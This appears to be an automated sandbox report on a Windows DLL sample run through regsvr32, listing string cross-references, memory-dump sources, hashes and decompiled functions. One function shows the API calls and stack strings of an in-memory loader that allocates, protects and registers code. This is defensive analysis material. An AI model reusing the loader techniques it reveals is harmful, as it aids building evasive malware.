b, xrefs: 00007FFA09507D47
#, xrefs: 00007FFA0950663F
M, xrefs: 00007FFA095082BF
o, xrefs: 00007FFA095061EF
+, xrefs: 00007FFA0950774F
t, xrefs: 00007FFA095081C7
_, xrefs: 00007FFA095081B7
d, xrefs: 00007FFA09506FE7
G, xrefs: 00007FFA095078FF
N, xrefs: 00007FFA09507167
t, xrefs: 00007FFA095052FF
V, xrefs: 00007FFA095059BF
&, xrefs: 00007FFA09504157
?, xrefs: 00007FFA095044B7
t, xrefs: 00007FFA09506F8F
w, xrefs: 00007FFA09504EFF
*, xrefs: 00007FFA095063BF
O, xrefs: 00007FFA09506107
|, xrefs: 00007FFA0950862F
J, xrefs: 00007FFA095049CF
<, xrefs: 00007FFA095041CF
3, xrefs: 00007FFA095054DF
m, xrefs: 00007FFA09506AAF
., xrefs: 00007FFA09508EA7
", xrefs: 00007FFA095079F7
g, xrefs: 00007FFA09505377
z, xrefs: 00007FFA095089AF
p, xrefs: 00007FFA0950565F
5, xrefs: 00007FFA09506DDF
N, xrefs: 00007FFA09507707
t, xrefs: 00007FFA09506F6F
b, xrefs: 00007FFA09505437
s, xrefs: 00007FFA09507ABF
i, xrefs: 00007FFA09507967
w, xrefs: 00007FFA09506F4F
>, xrefs: 00007FFA0950456F
C, xrefs: 00007FFA0950562F
o, xrefs: 00007FFA095080C7
9, xrefs: 00007FFA09504FD7
N, xrefs: 00007FFA09507877
a, xrefs: 00007FFA0950554F
v, xrefs: 00007FFA09506FCF
j, xrefs: 00007FFA09506B1F
6, xrefs: 00007FFA0950471F
, xrefs: 00007FFA09505C47
&, xrefs: 00007FFA095075FF
s, xrefs: 00007FFA09506E0F
?, xrefs: 00007FFA09506C47
/, xrefs: 00007FFA09504DF7
8, xrefs: 00007FFA09506A17
&, xrefs: 00007FFA095063A7
m, xrefs: 00007FFA09508A47
r, xrefs: 00007FFA09505487
?, xrefs: 00007FFA09506AE7
1, xrefs: 00007FFA09504437
9, xrefs: 00007FFA09505607
;, xrefs: 00007FFA095073EF
w, xrefs: 00007FFA095071BF
', xrefs: 00007FFA095068E7
n, xrefs: 00007FFA095063FF
n, xrefs: 00007FFA09508317
', xrefs: 00007FFA095054EF
t, xrefs: 00007FFA09508C47
T, xrefs: 00007FFA0950464F
I, xrefs: 00007FFA09506D8F
%, xrefs: 00007FFA09504837
J, xrefs: 00007FFA09504F6F
), xrefs: 00007FFA095082E7
T, xrefs: 00007FFA0950748F
8, xrefs: 00007FFA095073BF
*, xrefs: 00007FFA095057C7
<, xrefs: 00007FFA09506617
o, xrefs: 00007FFA095044C7
V, xrefs: 00007FFA0950612F
p, xrefs: 00007FFA095054E7
^, xrefs: 00007FFA09506D9F
q, xrefs: 00007FFA09505DCF
n, xrefs: 00007FFA09507EAF
/, xrefs: 00007FFA095082D7
C, xrefs: 00007FFA09508817
s, xrefs: 00007FFA095066B7
%, xrefs: 00007FFA09507A3F
p, xrefs: 00007FFA095044BF
v, xrefs: 00007FFA095045BF
:, xrefs: 00007FFA09507567
f, xrefs: 00007FFA095043FF
?, xrefs: 00007FFA09504C47
$, xrefs: 00007FFA09508B77
%, xrefs: 00007FFA095062E7
\, xrefs: 00007FFA09508797
K, xrefs: 00007FFA0950628F
>, xrefs: 00007FFA09508DFF
*, xrefs: 00007FFA09504B6F
q, xrefs: 00007FFA09505ADF
#, xrefs: 00007FFA0950673F
;, xrefs: 00007FFA09506997
K, xrefs: 00007FFA09508267
k, xrefs: 00007FFA0950878F
d, xrefs: 00007FFA0950769F
n, xrefs: 00007FFA0950666F
i, xrefs: 00007FFA0950589F
g, xrefs: 00007FFA095063F7
M, xrefs: 00007FFA09506AB7
Y, xrefs: 00007FFA095064BF
U, xrefs: 00007FFA095077FF
j, xrefs: 00007FFA09506287
f, xrefs: 00007FFA095090F7
z, xrefs: 00007FFA095044CF
b, xrefs: 00007FFA09506247
=, xrefs: 00007FFA0950536F
I, xrefs: 00007FFA0950689F
9, xrefs: 00007FFA095040BF
P, xrefs: 00007FFA0950688F
w, xrefs: 00007FFA09505027
R, xrefs: 00007FFA09505CAF
U, xrefs: 00007FFA09505457
\, xrefs: 00007FFA09504AB7
=, xrefs: 00007FFA09505937
%, xrefs: 00007FFA09507927
i, xrefs: 00007FFA09504E1F
~, xrefs: 00007FFA095045DF
i, xrefs: 00007FFA09506F3F
+, xrefs: 00007FFA09508837
C, xrefs: 00007FFA09504987
f, xrefs: 00007FFA0950615F
, xrefs: 00007FFA09505FE7
H, xrefs: 00007FFA09505E87
*, xrefs: 00007FFA09509167
p, xrefs: 00007FFA09507B17
A, xrefs: 00007FFA095062A7
k, xrefs: 00007FFA09508517
m, xrefs: 00007FFA09505A8F
b, xrefs: 00007FFA0950766F
5, xrefs: 00007FFA095060BF
#, xrefs: 00007FFA095047FF
H, xrefs: 00007FFA09504877
), xrefs: 00007FFA09504A67
%, xrefs: 00007FFA095062D7
J, xrefs: 00007FFA0950454F
%, xrefs: 00007FFA09504F97
y, xrefs: 00007FFA09506187
i, xrefs: 00007FFA09504ECF
', xrefs: 00007FFA0950853F
z, xrefs: 00007FFA09505887
*, xrefs: 00007FFA09507E97
t, xrefs: 00007FFA095078F7
h, xrefs: 00007FFA095059A7
b, xrefs: 00007FFA09507C17
?, xrefs: 00007FFA0950824F
4, xrefs: 00007FFA09505AC7
l, xrefs: 00007FFA09504B3F
?, xrefs: 00007FFA095070FF
$, xrefs: 00007FFA09505EFF
_, xrefs: 00007FFA0950718F
I, xrefs: 00007FFA09506727
?, xrefs: 00007FFA095077CF
x, xrefs: 00007FFA095089E7
e, xrefs: 00007FFA095059C7
R, xrefs: 00007FFA095043B7
/, xrefs: 00007FFA09506127
%, xrefs: 00007FFA09505B8F
-, xrefs: 00007FFA09507CC7
g, xrefs: 00007FFA0950727F
, xrefs: 00007FFA0950540F
u, xrefs: 00007FFA09508EDF
0, xrefs: 00007FFA09508557
j, xrefs: 00007FFA09508BD7
6, xrefs: 00007FFA0950427F
8, xrefs: 00007FFA09505DB7
&, xrefs: 00007FFA09505CE7
W, xrefs: 00007FFA09507037
%, xrefs: 00007FFA095090A7
H, xrefs: 00007FFA0950426F
}, xrefs: 00007FFA09504D67
F, xrefs: 00007FFA09506DCF
3, xrefs: 00007FFA0950580F
n, xrefs: 00007FFA09508D7F
M, xrefs: 00007FFA09504487
Q, xrefs: 00007FFA09507A2F
p, xrefs: 00007FFA095079B7
&, xrefs: 00007FFA09506A77
%, xrefs: 00007FFA095088DF
g, xrefs: 00007FFA09506DAF
u, xrefs: 00007FFA095065DF
*, xrefs: 00007FFA0950811F
$, xrefs: 00007FFA095090EF
), xrefs: 00007FFA0950484F
5, xrefs: 00007FFA09505147
R, xrefs: 00007FFA09507637
R, xrefs: 00007FFA095084E7
l, xrefs: 00007FFA095087AF
A, xrefs: 00007FFA09505EF7
+, xrefs: 00007FFA09507DFF
|, xrefs: 00007FFA09507B2F
5, xrefs: 00007FFA09505FBF
T, xrefs: 00007FFA09504637
c, xrefs: 00007FFA09508A3F
*, xrefs: 00007FFA0950643F
N, xrefs: 00007FFA09508A5F

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID:
String ID: $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$E$E$E$E$E$E$E$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
API String ID: 0-872547024
Opcode ID: 8d8e41402fa9ade4c982e5b92e0f0906a787b6072c1ffc9a98ef163c959b00e9
Instruction ID: 7df1fb6d38155682a52115daf4bd2aa68243a452ebf40e25d5ed7dc49465037d
Opcode Fuzzy Hash: 8d8e41402fa9ade4c982e5b92e0f0906a787b6072c1ffc9a98ef163c959b00e9
Instruction Fuzzy Hash: 3AA35F1250DBC1C9E332C23CB45878FAE8193A3319F484299D3E41AADBC7AE9155DF67

Uniqueness

Uniqueness Score: -1.00%

Function 009A0000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 009A0344
VirtualAlloc.KERNELBASE ref: 009A038A
VirtualProtect.KERNELBASE ref: 009A085C
RtlAddFunctionTable.KERNEL32 ref: 009A08E9

Strings

onTa, xrefs: 009A0148
RtlA, xrefs: 009A0133
Slee, xrefs: 009A0084
truc, xrefs: 009A00F2
eSys, xrefs: 009A0117
temI, xrefs: 009A011F
nf, xrefs: 009A0127
ddFu, xrefs: 009A013A
hIns, xrefs: 009A00EB
o, xrefs: 009A012E
ualA, xrefs: 009A00B5
Flus, xrefs: 009A00E4
Virt, xrefs: 009A00C5
Libr, xrefs: 009A009D
ncti, xrefs: 009A0141
tion, xrefs: 009A00F9
aryA, xrefs: 009A00A5
rote, xrefs: 009A00D5
GetN, xrefs: 009A0107
ct, xrefs: 009A00DD
lloc, xrefs: 009A00BD
Virt, xrefs: 009A00AD
ualP, xrefs: 009A00CD
Load, xrefs: 009A0095
ativ, xrefs: 009A010F
Cach, xrefs: 009A0100

Memory Dump Source

Source File: 00000003.00000002.323591806.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a0000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 998211078-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: 653aed0d6de58415c0b262fe7adc220077fe9ef461305a0d22300e9d2d94f996
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: C0520430A18B488BDB19DF18D8856BAB7F1FB95304F14462DE88BC7251DB34E946CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F4194 Relevance: 18.1, APIs: 12, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FFA7FFA094F4194(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x94f41d5;
				if (_t5 == 0) goto 0x94f41c9;
				if (_t5 == 0) goto 0x94f41bc;
				if (__edx == 1) goto 0x94f41b5;
				return 1;
			}

0x7ffa094f4198
0x7ffa094f419a
0x7ffa094f419f
0x7ffa094f41a4
0x7ffa094f41a9
0x7ffa094f41b4

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFA094F41BC
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFA094F4211
__scrt_fastfail.LIBCMT ref: 00007FFA094F422D
_RTC_Initialize.LIBCMT ref: 00007FFA094F4245
__scrt_initialize_default_local_stdio_options.LIBCMT ref: 00007FFA094F4267
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFA094F4283
__scrt_release_startup_lock.LIBCMT ref: 00007FFA094F42AE
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FFA094F42CD

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
String ID:
API String ID: 3885183344-0
Opcode ID: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
Instruction ID: 86fc5d1094dacb235e4cd14eacfd122ea211a6523451b8fec821db7dc5c92265
Opcode Fuzzy Hash: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
Instruction Fuzzy Hash: B4516D21E0C24385FA50AF72F9692BB2690AF5F384F44C035EA0D477A7DE2EE469C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F1580 Relevance: 10.6, APIs: 7, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFA7FFA094F1580(long long __rcx, long long __rdx, long long _a8, void* _a16) {
				char _v16;
				char _v24;
				long long _v32;
				void* _v40;
				long long _v48;
				long long _v56;
				void* _t41;
				intOrPtr* _t49;
				void* _t77;

				_a16 = __rdx;
				_a8 = __rcx;
				_v32 = 0xfffffffe;
				_t49 = _a16;
				if (_a8 == _t49) goto 0x94f1693;
				r8d = 0;
				E00007FFA7FFA094F1910(1, _t49, _a8, _t77); // executed
				if (0 == 1) goto 0x94f160a;
				E00007FFA7FFA094F1850(_a16);
				_v56 = _t49;
				E00007FFA7FFA094F1850(_a8);
				if ((E00007FFA7FFA094F2A50(_t49, _v56) & 0x000000ff) == 0) goto 0x94f160a;
				E00007FFA7FFA094F1850(_a16);
				E00007FFA7FFA094F1870(_t49, _a8, _t49);
				E00007FFA7FFA094F1850(_a16);
				_v48 = _t49;
				E00007FFA7FFA094F1850(_a8);
				if ((E00007FFA7FFA094F2A50(_t49, _v48) & 0x000000ff) == 0) goto 0x94f167a;
				E00007FFA7FFA094F1A20(_t49, _a16,  &_v24);
				_v40 = _t49;
				E00007FFA7FFA094F1AA0(_t49, _a16,  &_v16);
				_t41 = E00007FFA7FFA094F2A90(E00007FFA7FFA094F2A50(_t49, _v48) & 0x000000ff, _t49, _a8,  *_t49,  *_v40);
				goto 0x94f1693;
				E00007FFA7FFA094F2B00(_t41, _a16);
				return E00007FFA7FFA094F1F00(_t49, _a8, _t49);
			}

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F15C3
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F15D3
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F15F6

Part of subcall function 00007FFA094F1870: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F1883

Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFA094F15E4

Part of subcall function 00007FFA094F2A50: type_info::_name_internal_method.LIBCMTD ref: 00007FFA094F2A68

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F160F
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F161F
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFA094F1630

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::$EmptyQueue::StructuredWork$Affinity::operator!=Hardware$type_info::_name_internal_method
String ID:
API String ID: 1937815552-0
Opcode ID: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
Instruction ID: fe0dd003dba66e5c14f7d9d340260718416fa76171fe34d90b6450a2b3420a35
Opcode Fuzzy Hash: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
Instruction Fuzzy Hash: DD31E131A5DA4781DA10EF32F46147B6351EBCE7D0F009535E99E937A9CE2EE420C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F2600 Relevance: 9.1, APIs: 6, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00007FFA7FFA094F2600(long long __rcx, signed int __rdx, long long __r8, long long _a8, signed int _a16, long long _a24) {
				long long _v24;
				long long _v32;
				long long _v40;
				void* _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				char _v112;
				signed long long _v120;
				void* _t82;
				signed long long _t111;
				intOrPtr* _t113;
				intOrPtr* _t114;
				long long _t115;
				intOrPtr* _t116;
				intOrPtr* _t117;
				signed long long _t118;
				long long _t120;
				long long* _t121;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v24 = 0xfffffffe;
				_t111 = _a16 | 0x0000000f;
				_v120 = _t111;
				E00007FFA7FFA094F2830(_t111, _a8);
				if (_t111 - _v120 >= 0) goto 0x94f2659;
				_v120 = _a16;
				goto 0x94f2736;
				_t113 = _v120;
				_v104 = _t113;
				E00007FFA7FFA094F2150(_t113, _a8);
				_t114 =  *_t113;
				if (_t114 - _v104 > 0) goto 0x94f2696;
				goto 0x94f2736;
				E00007FFA7FFA094F2150(_t114, _a8);
				_t115 =  *_t114;
				_v96 = _t115;
				E00007FFA7FFA094F2830(_t115, _a8);
				_t116 = _t115 - _v96;
				_v88 = _t116;
				E00007FFA7FFA094F2150(_t116, _a8);
				if ( *_t116 - _v88 > 0) goto 0x94f2724;
				E00007FFA7FFA094F2150(_t116, _a8);
				_t117 =  *_t116;
				_v80 = _t117;
				E00007FFA7FFA094F2150(_t117, _a8);
				_t118 = _v80 +  *_t117;
				_v120 = _t118;
				goto 0x94f2736;
				E00007FFA7FFA094F2830(_t118, _a8);
				_v120 = _t118;
				_t120 = _v120 + 1;
				_v72 = _t120;
				E00007FFA7FFA094F1850(_a8);
				E00007FFA7FFA094F28E0(_t120, _v72); // executed
				_v64 = _t120;
				_t121 = _v64;
				_v112 = _t121;
				goto 0x94f2771;
				if (_a24 <= 0) goto 0x94f27b0;
				_t82 = E00007FFA7FFA094F18F0(_t121, _a8);
				_v40 = _t121;
				E00007FFA7FFA094F2C00(_t82, _v112);
				E00007FFA7FFA094F11E0(_t121, _v40, _a24);
				r8d = 0;
				E00007FFA7FFA094F1910(1, _t121, _a8, _a24);
				E00007FFA7FFA094F2BC0(E00007FFA7FFA094F2190(_a8), _t121);
				_v32 = _t121;
				E00007FFA7FFA094F1850(_a8);
				E00007FFA7FFA094F2C10(_t121, _t121, _v32,  &_v112);
				E00007FFA7FFA094F2150(_t121, _a8);
				 *_t121 = _v120;
				return E00007FFA7FFA094F23A0(_t121, _a8, _a24);
			}

APIs

Part of subcall function 00007FFA094F2830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F283E
Part of subcall function 00007FFA094F2830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFA094F284B

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F274B
type_info::_name_internal_method.LIBCMTD ref: 00007FFA094F275B
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F2784
char_traits.LIBCPMTD ref: 00007FFA094F27AB
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F27E4
construct.LIBCPMTD ref: 00007FFA094F27F9

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::$Work$EmptyQueue::Structured$Base::$BridgeContextDispatchIdentityQueueSchedulerThrottlerchar_traitsconstructtype_info::_name_internal_method
String ID:
API String ID: 3284725307-0
Opcode ID: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
Instruction ID: e6ea9dbdbd9428fa304917c395ba0be2cf74776f9d13a516fbc2589d0444997a
Opcode Fuzzy Hash: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
Instruction Fuzzy Hash: B751CD2261DB8685DA60DF65F46136AA3A0FBCE790F404135EADE87B59DF7DD410CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F1910 Relevance: 7.6, APIs: 5, Instructions: 59
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFA7FFA094F1910(signed char __edx, intOrPtr* __rax, long long __rcx, long long __r8, long long _a8, signed char _a16, long long _a24) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t32;
				intOrPtr* _t47;
				long long* _t49;

				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				if ((_a16 & 0x000000ff) != 0) goto 0x94f1930;
				goto 0x94f19f1;
				E00007FFA7FFA094F2150(__rax, _a8);
				if ( *((long long*)(__rax)) - 0x10 < 0) goto 0x94f19f1;
				E00007FFA7FFA094F2190(_a8);
				_t47 =  *((intOrPtr*)(__rax));
				_v40 = _t47;
				E00007FFA7FFA094F2BC0(E00007FFA7FFA094F2190(_a8), _t47);
				_v32 = _t47;
				E00007FFA7FFA094F1850(_a8);
				_t32 = E00007FFA7FFA094F2BD0(_t47, _v32);
				if (_a24 <= 0) goto 0x94f19bd;
				E00007FFA7FFA094F2C00(_t32, _v40);
				_v24 = _t47;
				E00007FFA7FFA094F2190(_a8);
				E00007FFA7FFA094F11E0(_t47, _v24, _a24);
				E00007FFA7FFA094F2150(_t47, _a8);
				_t49 =  *_t47 + 1;
				_v16 = _t49;
				E00007FFA7FFA094F1850(_a8);
				E00007FFA7FFA094F2100(_t49, _v40, _v16); // executed
				E00007FFA7FFA094F2150(_t49, _a8);
				 *_t49 = 0xf;
				return E00007FFA7FFA094F23A0(_t49, _a8, _a24);
			}

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F1972
type_info::_name_internal_method.LIBCMTD ref: 00007FFA094F1982
char_traits.LIBCPMTD ref: 00007FFA094F19B8
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F19D7
_aligned_msize.LIBCMTD ref: 00007FFA094F19EC

Memory Dump Source

